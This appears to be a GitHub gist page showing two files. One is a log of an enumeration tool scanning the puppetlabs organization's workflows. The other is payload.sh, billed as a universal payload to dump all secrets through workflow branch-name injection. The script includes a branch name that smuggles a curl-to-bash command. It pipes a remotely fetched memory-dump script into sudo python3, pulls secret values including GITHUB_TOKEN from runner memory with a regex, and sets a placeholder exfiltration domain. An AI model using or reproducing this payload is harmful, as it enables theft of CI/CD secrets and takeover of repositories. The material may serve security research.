Adnan Khan AdnaneKhan
AdnaneKhan
/ puppet_gato_results.txt
Created
June 12, 2024 21:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] The authenticated user is: RampagingSloth | |
| [+] The GitHub Classic PAT has the following scopes: gist, read:org, repo, workflow | |
| [+] Enumerating the puppetlabs organization! | |
| [!] The user has only public access! | |
| [+] About to enumerate 561 repos within the puppetlabs organization! | |
| [+] Querying and caching workflow YAML files! | |
| [+] Querying 0 out of 6 batches! | |
| [+] Querying 1 out of 6 batches! | |
| [+] Querying 2 out of 6 batches! | |
| [+] Querying 3 out of 6 batches! |
AdnaneKhan
/ payload.sh
Created
November 28, 2023 03:22
Universal "dump all secrets" payload for GitHub workflow branch name injection.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Replace with Burp collaborator domain or similar. | |
| YOUR_EXFIL="https://your-exfil-domain.com" | |
| # Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash' | |
| # Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN) | |
| if [[ "$OSTYPE" == "linux-gnu" ]]; then | |
| B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0` | |
| # Print to run log | |
| echo $B64_BLOB |